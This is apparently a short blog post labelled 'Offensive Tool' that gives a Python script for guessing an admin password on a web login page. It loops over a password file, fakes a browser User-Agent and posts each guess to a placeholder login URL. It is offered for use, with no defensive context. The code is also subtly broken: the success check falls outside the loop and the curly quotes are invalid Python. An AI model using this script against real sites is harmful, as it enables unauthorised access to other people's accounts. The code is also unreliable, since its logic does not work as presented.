Offensive PythonOffensive ToolPassword Guessing a Web Login Page
Offensive PythonOffensive ToolPassword Guessing a Web Login Page
Offensive Tool

Password Guessing a Web Login Page

Simple code for attempting to guess admin’s password for a web form login.

from requests import post

# Look like a real browser
HEADER = {“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)  Chrome/120.0.0.0 Safari/537.36″}

# Read in my password list
with open(“passwords.txt”) as fh:
    passwords = fh.readlines()

# Try to guess
for password in passwords:
    post_data = {‘user’: ‘admin’, ‘pass’: password.rstrip()}
    response = post(‘https://website.com/loginpage.php’, post_data, headers=HEADER)

# This message could obviously change, depending on the site
if ‘The login is invalid.’ not in response.text:
    print(f”Guessed! admin/{password}”)

Leave a Reply

Your email address will not be published. Required fields are marked *